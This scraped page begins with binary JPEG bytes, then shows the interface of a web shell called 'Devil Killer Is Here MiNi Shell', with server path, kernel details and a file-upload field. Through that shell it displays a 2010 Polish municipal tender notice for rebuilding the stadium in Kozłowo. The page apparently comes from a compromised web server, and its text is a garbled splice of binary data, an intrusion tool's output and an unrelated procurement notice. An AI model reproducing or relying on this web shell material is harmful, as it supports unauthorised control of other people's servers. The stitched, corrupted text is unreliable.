JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100324/65489-N-2010.html

<p class="kh_header"><b>Kozłowo: Kompleksowe zagospodarowanie stadionu w miejscowości Kozłowo</b><br>
<b>Numer ogłoszenia: 65489 - 2010; data zamieszczenia: 24.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kozłowo , Kozłowo 60A, 13-124 Kozłowo, woj. warmińsko-mazurskie, tel. 089 6267505, faks 089 6267502.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zagospodarowanie stadionu w miejscowości Kozłowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowe zagospodarowanie stadionu w Kozłowie polegające na: 
- wykonaniu bramy wjazdowej i bramy bocznej stadionowej oraz bramek bocznych   według projektu stanowiącego załącznik nr 2 do SIWZ
- wykonaniu widowni stadionu polegające na ułożeniu kostki brukowej gr.6 cm    w kolorze szarym wraz z wykonaniem obrzeży chodnikowych 
- zamontowaniu krzeseł stadionowych w zestawach pięciomiejscowych na stelażu    metalowym na przedłużonym elemencie montażowym ( stopa)
   malowanym proszkowo na kolor czarny . Krzesła w kolorach   
   czerwono - żółtym ( RAL 3002 i 1023) montowane na przemian o wysokości    oparcia od 230 - 250 mm. Krzesła powinny  spełniać atesty trudnopalności ,    toksyczności i wytrzymałości oraz być odporne na wysokie i niskie temperatury    zewnętrzne i działanie promieniowania UV.  Krzesła powinny także posiadać otwór    odprowadzający wodę, a ich wykończenie zapewniać gładką i bezpieczną    powierzchnię. Wysokość zamocowania krzesła licząc od poziomu gotowego podłoża      do poziomu siedziska powinna wynosić ok.450 mm.
 - wykonaniu przejść przy ławkach trenerskich z kostki brukowej szarej gr. 6 cm wraz z   wykonaniem obrzeży
- wykonaniu chodnika przy budynku socjalnym z kostki brukowej szarej gr. 6 cm wraz   z wykonaniem obrzeży 
- wykonaniu warstwy wyrównującej betonowej pod zaplecze socjalne gr.8 cm
- zamontowaniu kontenerów sanitarno - szatniowych wraz z wyposażeniem 
  (bez podłączania mediów) zgodnie z  załączonym schematem stanowiącym załącznik    nr 3 do SIWZ 


Konstrukcja kontenerów stalowa, wykonana z profili zamkniętych, ceowników i kątowników (kolor niebieski RAL 5010) Podłoga kontenerów: legary, blacha ocynkowana 0,5 mm, podwieszenie ocieplone, wełna szklana, płyta wiórowa OSB, wykładzina PCV, listwy wykończeniowe. Ściany zewnętrzne kontenerów:
Blacha ocynkowana powlekana trapezowa (kolor niebieski RAL 5010), szkielet       drewniany, wełna szklana, płyta wiórowa dwustronnie laminowana, listwy            wykończeniowe. Ściany wewnętrzne w kolorze białym wykończone panelami PCV   wraz z  oblistwowaniem. Stropodach: blacha ocynkowana, wełna szklana, płyta   wiórowa dwustronnie laminowana, listwy wykończeniowe. Drzwi  wewnętrzne w  kolorze białym. Drzwi zewnętrzne: stalowe  ocynkowane, ocieplone
- wykonaniu ogrodzenia stadionu od strony drogi powiatowej ogrodzeniem panelowym    systemowym np. systemu Nyloflor 3 D lub równoważnym - siatka w kolorze      zielonym o wys. 2030mm x 2500mm ze słupkami wysokości 2600mm wraz z    niezbędnym osprzętem. Szczegółowy zakres prac oraz ich umiejscowienie    przedstawia przedmiar robót stanowiący załącznik nr 4 do SIWZ oraz mapa      sytuacyjna stanowiąca załącznik nr 5 do SIWZ. 
1.1	Wykonawca zobowiązany  jest udzielić gwarancji jakości na przedmiot zamówienia (tj. roboty budowlane i wbudowane materiały) na okres co najmniej 36 miesięcy, chyba że gwarancja producenta jest dłuższa, wówczas obowiązującą jest gwarancja producenta.


1.2	Zamawiający dopuszcza możliwość zaoferowania materiałów i urządzeń o parametrach równoważnych lecz nie gorszych niż  określone w dokumentacji projektowej przy czym Wykonawca jest zobowiązany załączyć stosowne karty zawierające parametry techniczne tych materiałów w celu porównania ich równoważności .
1.3	Wykonawca zobowiązany jest do wykonania zamówienia w sposób rzetelny i terminowy,  zgodnie z dokumentacją projektową,  zasadami sztuki budowlanej przepisami technicznymi , zasadami bhp i ppoż., obowiązującymi normami technicznymi, przepisami prawa budowlanego oraz zaleceniami Zamawiającego.
1.4	Wykonawca zobowiązany jest do zabezpieczenia terenu budowy pod względem bhp i ppoż. oraz do ponoszenia odpowiedzialności wobec Zamawiającego i osób trzecich za szkody powstałe w trakcie realizacji zamówienia
1.5	Wykonawca zobowiązany jest do zabezpieczenia terenu budowy przed wejściem osób trzecich oraz czytelnego oznaczenia budowy.
1.6	Wykonawca  zrealizuje zamówienie z materiałów własnych, nowych przy czym muszą one posiadać wymagane prawem certyfikaty, atesty i zaświadczenia o dopuszczeniu zastosowanych materiałów do stosowania w budownictwie zgodnie z art. 10 ustawy z dnia 07.07.1994r. Prawo budowlane.
1.7	Wykonawca jest zobowiązany na uzasadnione żądanie Zamawiającego lub Inspektora Nadzoru do przedłożenia dowodów zakupu materiałów podstawowych i atestów stwierdzających zgodność użytych materiałów z obowiązującymi normami oraz przedłożenia na zakupione przez siebie materiały kart gwarancyjnych i wszelkich innych dokumentów koniecznych do realizacji uprawnień wobec producenta  lub sprzedawcy materiałów.
1.8	 Wykonawca zobowiązany jest zapewnić kierownictwo budowy posiadające    uprawnienia budowlane odpowiedniej specjalności, wpisanej na listę członków  właściwej izby samorządu zawodowego, sprawujące ciągły nadzór nad prawidłowością przebiegu prowadzonych robót budowlanych.
     1.9Wykonawcę zobowiązuje się do przerwania robót na żądanie Zamawiającego oraz             zabezpieczenie wykonanych robót.
     2. Wykonawca zobowiązany jest do uporządkowania terenu budowy po zakończeniu              robót.
     2.1 Wykonawca zobowiązany jest do zgłaszania zamiaru wykonania  robót              zamiennych do Zamawiającego. Powyższa zamiana musi uzyskać akceptację                Zamawiającego 
     2.2 Wykonawca zobowiązany jest do dostosowania się do decyzji Zamawiającego i              powołanego przez niego Inspektora Nadzoru, którzy na każdym etapie realizacji             zamówienia będą mogli przerwać prace na skutek zastosowania materiałów , które nie             będą  zgodne z wymaganiami określonymi rozdziale I art.10 ust.1 ustawy z dnia 7              lipca 1994 r. Prawo budowlane. Rezygnacja powinna nastąpić pisemnie, niezwłocznie             po stwierdzeniu niezgodności. Zastosowane materiały inne niż wyżej wymienione po             stwierdzeniu nieprawidłowości Wykonawca niezwłocznie zdemontuje na koszt             własny.
  2.3 Wykonawca jest zobowiązany dostarczyć na żądanie Inspektora Nadzoru           Zamawiającego własnym kosztem i staraniem wszelkie pomiary, atesty i niezbędne            badania wykonane przez właściwe i niezależne jednostki badawcze..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.24-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający celem potwierdzenia , że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie ustawy, żąda załączenia do oferty następujących dokumentów;
       
      - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji          działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub          zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6          miesięcy przed upływem terminu składania ofert.
      - oświadczenie z art. 22 ust 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień          publicznych - załącznik nr 6 do SIWZ ( w przypadku wspólnego ubiegania się o           udzielenie zamówienia przez dwóch  lub więcej wykonawców do oferty muszą być         złożone oświadczenia przez  każdego z  nich)
      - zaświadczenie z właściwego urzędu skarbowego potwierdzające, że wykonawca nie         zalega z uiszczaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie,         odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania         decyzji organu podatkowego , wystawione nie wcześniej niż 3 miesiące przed upływem         terminu składania ofert
     -  zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych          potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie                   zdrowotne lub społeczne wystawione nie wcześniej niż 3 miesięce przed upływem          terminu składania ofert

      -   oświadczenie o nie podleganiu wykluczeniu z przedmiotowego postępowania na           podstawie art24 ust. 1 w związku z art. 22 ust.1 pkt. 4 ustawy Prawo zamówień            publicznych -  załącznik nr 7 do SIWZ ( w przypadku wspólnego ubiegania się o            udzielenie zamówienia przez dwóch  lub więcej wykonawców do oferty muszą być           złożone oświadczenia przez  każdego z nich)
      -  aktualną informację z Krajowego Rejestru Karnego lub zaświadczenie właściwego           organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie           określonym w art.24 ust.1 pkt. 4-8 Prawa zamówień publicznych, wystawione nie           wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i wykształcenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia żąda załączenia do oferty następujących dokumentów
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje) 


- sporządzenia i załączenia do oferty wykazu  wykonanych robót  budowlanych w   okresie ostatnich pięciu lat,   a jeżeli okres prowadzenia działalności jest  krótszy w    tym okresie co najmniej jedną  robotę budowlaną o wartości co najmniej    300 000,00 zł, odpowiadającą swoim  rodzajem robotom stanowiącym przedmiot    zamówienia, z  podaniem ich wartości   oraz daty i miejsca wykonania oraz    załączenie dokumentów potwierdzających ich  należyte wykonanie ( referencje,     protokoły odbioru, itp.) załącznik nr 8 do SIWZ
  - kopie uprawnień budowlanych kierownika budowy, oraz aktualne zaświadczenie o      przynależności do Izby Inżynierów Budownictwa
  - sporządzenia i załączenia do oferty wykazu osób które będą  wykonywać     zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z      informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
     ( załącznik nr 9 do SIWZ)
             - oświadczenia wykonawcy na temat wielkości średniego rocznego zatrudnienia u                wykonawcy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a                jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (załącznik nr 10                do SIWZ)
             - informacje na temat podwykonawców ( załącznik nr 11 do SIWZ) , wypełnić                jeżeli  Wykonawca będzie realizował  zamówienie przy pomocy                podwykonawców.
             - w przypadku korzystania z potencjału innych podmiotów Wykonawca                przedstawi odpowiednie zobowiązanie tych podmiotów do udostępnienia                swego  potencjału na czas realizacji zamówienia (załącznik nr 12A,12,B,12C do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Zamawiający celem potwierdzenia że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia żąda załączenia do oferty następujących dokumentów

- załączenia do oferty informacji banku, w którym wykonawca posiada rachunek    bankowy, potwierdzający wysokość posiadanych środków finansowych lub zdolność    kredytową wykonawcy na kwotę nie mniejszą niż 300 000,00 zł wystawione nie    wcześniej niż 3 miesiące przed upływem terminu składania ofert
- załączenia do oferty opłaconej  polisy ubezpieczeniowej, a w przypadku jej braku       innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od    odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na    kwotę nie niższą niż 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>PEŁEN WYKAZ DOKUMENTÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO ZAWARTY JEST W SPECYFIKACJI ISTOTNYCH WARUNKÓW ZAMÓWIENIA. OCENA SPEŁNIANIA WARUNKÓW W POSTĘPOWANIU BĘDZIE DOKONYWANA Z ZASTOSOWANIEM FORMUŁY SPEŁNIA/NIESPEŁNIA.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa   w   sprawie   realizacji   zamówienia   publicznego   zawarta   zostanie   z   uwzględnieniem postanowień wynikających z treści niniejszej SIWZ oraz danych  zawartych w ofercie. Zamawiający podpisze umowę z Wykonawcą, który przedłoży   najkorzystniejszą ofertę. Zamawiający zastrzega sobie prawo zmian nieistotnych   treści umowy oraz zmian dotyczących;

 1.   Zmiana terminu realizacji przedmiotu umowy

1.1 zmiany spowodowane warunkami atmosferycznymi, w szczególności:
1.1.1     warunki    atmosferyczne    uniemożliwiające    prowadzenie    robót    budowlanych                zgodnie  z wymaganiami, przeprowadzanie  prób  i  sprawdzeń,            dokonywanie odbiorów;
1.1.2    klęski żywiołowe;

1.2    	zmiany    spowodowane    warunkami    geologicznymi,    terenowymi,           archeologicznymi, wodnymi itp. w szczególności:

1.2.1	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał, itp.);
1.2.2	odmienne od przyjętych w dokumentacji projektowej warunki terenowe w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
1.2.3	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
1.2.4	wykopaliska archeologiczne, szkody górnicze, nie przewidywane w SIWZ ;
1.3	zmiany    będące    następstwem    okoliczności    leżących    po    stronie               Zamawiającego, w szczególności:
1.3.1	wstrzymanie realizacji umowy przez Zamawiającego;
1.3.2	konieczność   usunięcia   błędów   lub   wprowadzenia   zmian   w   dokumentacji   projektowej lub dokumentacji technicznej urządzeń;
  1.4      zmiany będące następstwem działania organów administracji, w szczególności:
1.4.1	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
1.4.2	wydanie postanowienia o wstrzymaniu robót budowlanych, w przypadku o którym mowa w art. 50 ust. l ustawy Prawo budowlane
1.4.3	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego -konieczności nie przewidywano przy zawieraniu umowy
1.4.4	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych  lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy
    1.5	 inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy                skutkujące niemożliwością prowadzenia działań w celu wykonania umowy
          W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1 -       1.5  termin wykonania umowy może uiec odpowiedniemu przedłużeniu, o czas        niezbędny do zakończenia  wykonywania jej przedmiotu w sposób należyty.
     2	Zmiany osobowe
2.1	zmiana   osób,   przy   pomocy   których   Wykonawca   realizuje   przedmiot   umowy   na   inne legitymujące    się    co    najmniej    równoważnymi    uprawnieniami, o    których    mowa w ustawie Prawo budowlane, prawo geologiczne i górnicze lub innych ustawach,
2.2	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano   określonego   doświadczenia   lub   wykształcenia   na   inne    legitymujące   się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ
3.  Zmiany organizacji spełniania świadczenia
3.1	zmiana zasad dokonywania odbiorów świadczonych usług lub robót, jeśli nie zmniejszy to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów dokonywania odbiorów, które obciążałyby Zamawiającego;
 3.2. zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie           realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie           może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej  realizacji umowy;
4.     Płatności
4.1	zmiany terminów  płatności  wynikające  z wszelkich  zmian  wprowadzanych  do  umowy, a także zmiany samoistne o ile nie spowodują konieczności zapłaty Wykonawcy odsetek wyższych niż odsetki od lokat na rachunku bieżącym zamawiającego;
4.2	zmiana sposobu  rozliczania umowy   lub dokonywania  płatności   częściowych  na  rzecz wykonawcy;

5.	Pozostałe zmiany
5.1    Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
5.2 Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu
5.3 Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
5.4   Wstrzymanie realizacji zamówienia przez właściwe służby i organy na  skutek następstw nieszczęśliwych  wypadków przy pracy

6. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:

6.1	ograniczenie przedmiotu świadczenia, jeśli taką możliwość przewidywała umowa
6.2	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy              (np. zmiana nr rachunku bankowego)
6.3      zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między               Stronami; 

Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kozłowie 
13-124 Kozłowo
Kozłowo 60A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2010 godzina 12:00, miejsce: Urząd Gminy w Kozłowie 
13-124 Kozłowo
Kozłowo 60A
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




